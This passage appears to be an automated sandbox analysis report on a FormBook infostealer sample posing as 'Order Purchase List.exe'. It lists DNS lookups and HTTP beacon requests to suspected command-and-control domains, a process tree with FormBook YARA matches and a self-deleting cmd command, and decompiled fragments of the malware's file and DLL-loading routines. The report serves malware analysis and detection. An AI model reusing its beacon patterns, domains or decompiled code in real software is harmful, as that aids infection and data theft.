                                    Oct 8, 2021 11:24:23.755902052 CEST | 192.168.2.3 | 8.8.8.8 | 0x4eb6 | Standard query (0) | www.auxiliacapitalpartnersllc.com | A (IP address) | IN (0x0001)
                                    Oct 8, 2021 11:24:29.246157885 CEST | 192.168.2.3 | 8.8.8.8 | 0xc0f7 | Standard query (0) | www.hottorchlighter.com | A (IP address) | IN (0x0001)
                                    Oct 8, 2021 11:24:34.370162010 CEST | 192.168.2.3 | 8.8.8.8 | 0x794c | Standard query (0) | www.bigbigsea.com | A (IP address) | IN (0x0001)
                                    Oct 8, 2021 11:24:39.758687973 CEST | 192.168.2.3 | 8.8.8.8 | 0x1a9f | Standard query (0) | www.greatamericanlandworks.com | A (IP address) | IN (0x0001)
                                    Oct 8, 2021 11:24:50.642997026 CEST | 192.168.2.3 | 8.8.8.8 | 0xee59 | Standard query (0) | www.iphone13promax.show | A (IP address) | IN (0x0001)

                                    DNS Answers

                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                    Oct 8, 2021 11:24:18.588309050 CEST | 8.8.8.8 | 192.168.2.3 | 0x1362 | No error (0) | www.inatividigitali.com | inatividigitali.com | | CNAME (Canonical name) | IN (0x0001)
                                    Oct 8, 2021 11:24:18.588309050 CEST | 8.8.8.8 | 192.168.2.3 | 0x1362 | No error (0) | inatividigitali.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                    Oct 8, 2021 11:24:23.786691904 CEST | 8.8.8.8 | 192.168.2.3 | 0x4eb6 | No error (0) | www.auxiliacapitalpartnersllc.com | auxiliacapitalpartnersllc.com | | CNAME (Canonical name) | IN (0x0001)
                                    Oct 8, 2021 11:24:23.786691904 CEST | 8.8.8.8 | 192.168.2.3 | 0x4eb6 | No error (0) | auxiliacapitalpartnersllc.com | | 68.178.221.206 | A (IP address) | IN (0x0001)
                                    Oct 8, 2021 11:24:29.276962996 CEST | 8.8.8.8 | 192.168.2.3 | 0xc0f7 | No error (0) | www.hottorchlighter.com | | 104.21.44.253 | A (IP address) | IN (0x0001)
                                    Oct 8, 2021 11:24:29.276962996 CEST | 8.8.8.8 | 192.168.2.3 | 0xc0f7 | No error (0) | www.hottorchlighter.com | | 172.67.206.214 | A (IP address) | IN (0x0001)
                                    Oct 8, 2021 11:24:34.403768063 CEST | 8.8.8.8 | 192.168.2.3 | 0x794c | No error (0) | www.bigbigsea.com | bigbigsea.com | | CNAME (Canonical name) | IN (0x0001)
                                    Oct 8, 2021 11:24:34.403768063 CEST | 8.8.8.8 | 192.168.2.3 | 0x794c | No error (0) | bigbigsea.com | | 154.23.204.56 | A (IP address) | IN (0x0001)
                                    Oct 8, 2021 11:24:39.799196959 CEST | 8.8.8.8 | 192.168.2.3 | 0x1a9f | Name error (3) | www.greatamericanlandworks.com | none | none | A (IP address) | IN (0x0001)
                                    Oct 8, 2021 11:24:50.715248108 CEST | 8.8.8.8 | 192.168.2.3 | 0xee59 | Server failure (2) | www.iphone13promax.show | none | none | A (IP address) | IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.inatividigitali.com
                                    • www.auxiliacapitalpartnersllc.com
                                    • www.hottorchlighter.com
                                    • www.bigbigsea.com

                                    HTTP Packets

                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    0 | 192.168.2.3 | 49829 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Oct 8, 2021 11:24:18.630424976 CEST | 7336 | OUT | GET /gnui/?D81Ltve=MSRjHgM9j7I5HOqdL19ZieQAx0QZYnhjbVtYOT6RDGM9GDKuXhbXwP3ESIufbr/Me9Gt&v0=mjfD3V_ HTTP/1.1
                                    Host: www.inatividigitali.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Oct 8, 2021 11:24:18.744803905 CEST | 7337 | IN | HTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Fri, 08 Oct 2021 09:24:18 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "615f93b1-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    1 | 192.168.2.3 | 49830 | 68.178.221.206 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Oct 8, 2021 11:24:23.978734970 CEST | 7338 | OUT | GET /gnui/?D81Ltve=jxkSMADL8om04CnCt2uvg3koohdaHD/94Z7CDjzCNfrBt1nbgpVJnnhJbuZar5zysKNA&v0=mjfD3V_ HTTP/1.1
                                    Host: www.auxiliacapitalpartnersllc.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Oct 8, 2021 11:24:24.225665092 CEST | 7339 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 08 Oct 2021 09:24:24 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/7.4.16
                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                    Retry-After: 86400
                                    Upgrade: h2,h2c
                                    Connection: Upgrade, close
                                    Vary: Accept-Encoding
                                    Transfer-Encoding: chunked
                                    Content-Type: text/html; charset=UTF-8
                                    Data Ascii: 978<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title> is under construction</title> <meta name="description" content="Auxiliacapitalpartnerslia.com" /> <meta name="generator" content="Free UnderConstructionPage plugin for WordPress"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,900"> <link rel="stylesheet" href="http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.89" type="text/css"><link rel="stylesheet" href="http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.89" type="text/css"><link rel="stylesheet" href="http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.89" type
                                    Oct 8, 2021 11:24:24.225699902 CEST | 7340 | IN | Data Raw: 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 75 78 69 6c 69 61 63 61 70 69 74 61 6c 70 61 72 74 6e 65 72 73 6c 6c 63 2e 63 6f 6d
                                    Data Ascii: ="text/css"><link rel="stylesheet" href="http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=3.89" type="text/css"><link rel="icon" sizes="128x128" href="http://www.auxiliacap
                                    Oct 8, 2021 11:24:24.225713015 CEST | 7341 | IN | Data Raw: 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 77 6f 72 64 70 72 65 73 73 20 66 61 2d 32 78 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20
                                    Data Ascii: -login.php"><i class="fa fa-wordpress fa-2x" aria-hidden="true"></i></a></div> </body></html>0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    2 | 192.168.2.3 | 49831 | 104.21.44.253 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Oct 8, 2021 11:24:29.295742035 CEST | 7342 | OUT | GET /gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_ HTTP/1.1
                                    Host: www.hottorchlighter.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Oct 8, 2021 11:24:29.325709105 CEST | 7343 | IN | HTTP/1.1 301 Moved Permanently
                                    Date: Fri, 08 Oct 2021 09:24:29 GMT
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Cache-Control: max-age=3600
                                    Expires: Fri, 08 Oct 2021 10:24:29 GMT
                                    Location: https://www.hottorchlighter.com/gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wah6xLfjRmYTrDzfmeJVkvFz1biHceIlKPbd5kpj6JT5n2Q4udTZbxQR%2FXb5eXBQVwyW2rbtgl7%2F2IqkcdjMSMWVxI5pL7KqbJXUbs6NzWEjluXpUddQi%2BdJzGFKW9r3MF%2FmEvvQCEE%2Fyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 69ae51032c10698f-FRA
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    3 | 192.168.2.3 | 49833 | 154.23.204.56 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Oct 8, 2021 11:24:34.572302103 CEST | 7351 | OUT | GET /gnui/?D81Ltve=+ILGKZDievfdlhE08A6+0Ox9ZT8Pbvv5JFHshEbNzSpcbgaG6QnGXyVZrWQJJYTOfSqp&v0=mjfD3V_ HTTP/1.1
                                    Host: www.bigbigsea.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Oct 8, 2021 11:24:34.738827944 CEST | 7351 | IN | HTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Fri, 08 Oct 2021 09:24:34 GMT
                                    Content-Type: text/html
                                    Content-Length: 146
                                    Connection: close
                                    Set-Cookie: security_session_verify=b916c671982bbc4ddcef9e4fa11e215e; expires=Mon, 11-Oct-21 17:24:34 GMT; path=/; HttpOnly
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                    System Behavior

                                    General

                                    Start time:11:22:38
                                    Start date:08/10/2021
                                    Path:C:\Users\user\Desktop\Order Purchase List.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\Order Purchase List.exe'
                                    Imagebase:0xfb0000
                                    File size:1104896 bytes
                                    MD5 hash:903FEBB63C1A5AFA29741401EAC430AF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:low

                                    General

                                    Start time:11:22:58
                                    Start date:08/10/2021
                                    Path:C:\Users\user\Desktop\Order Purchase List.exe
                                    Wow64 process (32bit):true
                                    Commandline:{path}
                                    Imagebase:0x9f0000
                                    File size:1104896 bytes
                                    MD5 hash:903FEBB63C1A5AFA29741401EAC430AF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:11:23:00
                                    Start date:08/10/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff720ea0000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:11:23:33
                                    Start date:08/10/2021
                                    Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                    Imagebase:0x140000
                                    File size:32768 bytes
                                    MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    General

                                    Start time:11:23:38
                                    Start date:08/10/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\Order Purchase List.exe'
                                    Imagebase:0xd80000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:11:23:38
                                    Start date:08/10/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7f20f0000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis

                                      Execution Graph

                                      Execution Coverage:8.4%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:3%
                                      Total number of Nodes:676
                                      Total number of Limit Nodes:73

                                      Graph

417e74 16063->16069 16085 41a070 16063->16085 16066 417e60 16067 41a0b0 2 API calls 16066->16067 16068 417e6a 16067->16068 16068->15999 16070 41a0b0 2 API calls 16069->16070 16071 417ec9 16070->16071 16071->15999 16073 40722f 16072->16073 16074 407145 16072->16074 16073->16001 16074->16073 16075 413a60 6 API calls 16074->16075 16076 4071b2 16075->16076 16077 41a0b0 2 API calls 16076->16077 16078 4071d9 16076->16078 16077->16078 16078->16001 16080 408195 16079->16080 16081 409b50 LdrLoadDll 16080->16081 16082 4081c8 16081->16082 16084 4081ed 16082->16084 16088 40b350 16082->16088 16084->16055 16105 418810 16085->16105 16089 40b37c 16088->16089 16090 418470 LdrLoadDll 16089->16090 16091 40b395 16090->16091 16092 40b39c 16091->16092 16099 4184b0 16091->16099 16092->16084 16096 40b3d7 16097 418720 2 API calls 16096->16097 16098 40b3fa 16097->16098 16098->16084 16100 4191f0 LdrLoadDll 16099->16100 16101 40b3bf 16100->16101 16101->16092 16102 418aa0 16101->16102 16103 418abf 16102->16103 16104 4191f0 LdrLoadDll 16102->16104 16103->16096 16104->16103 16106 4191f0 LdrLoadDll 16105->16106 16107 417e59 16106->16107 16107->16066 16107->16069 16109 40d3a4 16108->16109 16110 4191f0 LdrLoadDll 16108->16110 16109->16015 16111 418080 16109->16111 16110->16109 16112 4191f0 LdrLoadDll 16111->16112 16113 40d3b5 16112->16113 16113->16013 16113->16014 16115 4072a8 16114->16115 16116 409b50 LdrLoadDll 16115->16116 16117 4072c3 16116->16117 16118 413e60 LdrLoadDll 16117->16118 16119 4072d3 16118->16119 16120 4072dc PostThreadMessageW 16119->16120 16121 4072f0 16119->16121 16120->16121 16121->16030 16123 40d3e6 16122->16123 16126 418120 16123->16126 16127 4191f0 LdrLoadDll 16126->16127 16128 40d41e 16127->16128 16128->16030 16130 40d2d1 16129->16130 16138 418970 16130->16138 16133 40d318 16133->15988 16134 418190 LdrLoadDll 16135 40d32f 16134->16135 16135->16133 16136 418790 LdrLoadDll 16135->16136 16137 40d34e 16136->16137 16137->15988 16139 40d311 16138->16139 16140 4191f0 LdrLoadDll 
16138->16140 16139->16133 16139->16134 16140->16139

                                      Executed Functions

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4186a0-4186e9 call 4191f0 NtReadFile
                                      C-Code - Quality: 37%
                                      			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                      				void* _t18;
                                      				void* _t27;
                                      				intOrPtr* _t28;
                                      
                                      				_t13 = _a4;
                                      				_t28 = _a4 + 0xc48;
                                      				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                      				_t4 =  &_a40; // 0x413a41
                                      				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
                                      				return _t18;
                                      			}







                                      APIs
                                      • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: A:A
                                      • API String ID: 2738559852-2859176346
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 266 409b50-409b6c 267 409b74-409b79 266->267 268 409b6f call 41af80 266->268 269 409b7b-409b7e 267->269 270 409b7f-409b8d call 41b3a0 267->270 268->267 273 409b9d-409bae call 419730 270->273 274 409b8f-409b9a call 41b620 270->274 279 409bb0-409bc4 LdrLoadDll 273->279 280 409bc7-409bca 273->280 274->273 279->280
                                      C-Code - Quality: 100%
                                      			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
                                      				char* _v8;
                                      				struct _EXCEPTION_RECORD _v12;
                                      				struct _OBJDIR_INFORMATION _v16;
                                      				char _v536;
                                      				void* _t15;
                                      				struct _OBJDIR_INFORMATION _t17;
                                      				struct _OBJDIR_INFORMATION _t18;
                                      				void* _t30;
                                      				void* _t31;
                                      				void* _t32;
                                      
                                      				_t24 = _a8;
                                      				_v8 =  &_v536;
                                      				_t15 = E0041AF80( &_v12, 0x104, _a8);
                                      				_t31 = _t30 + 0xc;
                                      				if(_t15 != 0) {
                                      					_t17 = E0041B3A0(_v8, _t24, __eflags, _v8);
                                      					_t32 = _t31 + 4;
                                      					__eflags = _t17;
                                      					if(_t17 != 0) {
                                      						E0041B620( &_v12, 0);
                                      						_t32 = _t32 + 8;
                                      					}
                                      					_t18 = E00419730(_v8);
                                      					_v16 = _t18;
                                      					__eflags = _t18;
                                      					if(_t18 == 0) {
                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                      						return _v16;
                                      					}
                                      					return _t18;
                                      				} else {
                                      					return _t15;
                                      				}
                                      			}














                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 281 4185ea-418641 call 4191f0 NtCreateFile
                                      C-Code - Quality: 82%
                                      			E004185EA(void* __eax, intOrPtr __ecx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                                      				intOrPtr _v0;
                                      				long _t24;
                                      				void* _t36;
                                      
                                      				_push(__eax);
                                      				 *((intOrPtr*)(__eax + 0x553ccac3)) = __ecx;
                                      				_t18 = _v0;
                                      				_t5 = _t18 + 0xc40; // 0xc40
                                      				E004191F0(_t36, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                                      				_t24 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                                      				return _t24;
                                      			}







                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: fb6808111876ee8dfa3981f76c5c80453bf94e5c21ac7623d8ebcf22d56ef23f
                                      • Instruction ID: 967dc90043ee97e83f2d45023f89719c3bc3e535c2b0ede79da7b63b9724e7ed
                                      • Opcode Fuzzy Hash: fb6808111876ee8dfa3981f76c5c80453bf94e5c21ac7623d8ebcf22d56ef23f
                                      • Instruction Fuzzy Hash: 2501ABB2215208AFCB08CF88DC95EEB37ADBF8C754F158248FA1D97251C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 284 4185f0-418606 285 41860c-418641 NtCreateFile 284->285 286 418607 call 4191f0 284->286 286->285
                                      C-Code - Quality: 100%
                                      			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                      				long _t21;
                                      				void* _t31;
                                      
                                      				_t3 = _a4 + 0xc40; // 0xc40
                                      				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                      				return _t21;
                                      			}






                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 287 4187ca-41880d call 4191f0 NtAllocateVirtualMemory
                                      C-Code - Quality: 79%
                                      			E004187CA(intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32, void* _a1437656308) {
                                      				long _t15;
                                      				void* _t22;
                                      
                                      				_pop( *_t1);
                                      				_t11 = _a8;
